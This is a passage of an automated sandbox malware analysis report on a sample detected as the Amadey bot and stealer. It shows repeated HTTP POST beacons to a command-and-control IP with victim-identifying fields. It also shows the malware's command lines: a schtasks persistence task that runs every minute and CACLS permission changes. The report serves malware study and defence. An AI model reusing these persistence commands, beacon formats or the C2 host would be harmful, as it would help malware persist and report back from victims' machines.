                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.450054193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:14.093854904 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.450055193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:18.333609104 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.450056193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:22.598258972 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.450057193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:26.843091965 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.450058193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:31.080040932 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.450059193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:35.327351093 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.450060193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:39.547302008 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.450061193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:43.782538891 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.450062193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:48.001888990 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.450063193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:52.234913111 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:17:01:45
                  Start date:22/11/2024
                  Path:C:\Users\user\Desktop\Week13.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Week13.exe"
                  Imagebase:0xfb0000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000000.1746271067.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1754885360.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
                  Imagebase:0x440000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000000.1751724718.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.4210225750.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 92%, ReversingLabs
                  Reputation:low
                  Has exited:false

                  Target ID:2
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Imagebase:0xcd0000
                  File size:187'904 bytes
                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit
                  Imagebase:0x240000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Imagebase:0x240000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "oneetx.exe" /P "user:N"
                  Imagebase:0xd50000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:17:01:46
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "oneetx.exe" /P "user:R" /E
                  Imagebase:0x400000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:17:01:47
                  Start date:22/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x440000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.1758679775.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000000.1757106688.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:10
                  Start time:17:01:47
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Imagebase:0x240000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:17:01:47
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "..\cb7ae701b3" /P "user:N"
                  Imagebase:0xd50000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:17:01:47
                  Start date:22/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "..\cb7ae701b3" /P "user:R" /E
                  Imagebase:0xd50000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:15
                  Start time:17:02:01
                  Start date:22/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x7ff7699e0000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.1907375916.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000000.1905919895.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:18
                  Start time:17:03:00
                  Start date:22/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x440000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.2495480705.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.2495730758.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:19
                  Start time:17:04:00
                  Start date:22/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x440000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.3096531866.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.3095824549.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:20
                  Start time:17:05:00
                  Start date:22/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x440000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000000.3695875286.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.3696620232.0000000000441000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  No disassembly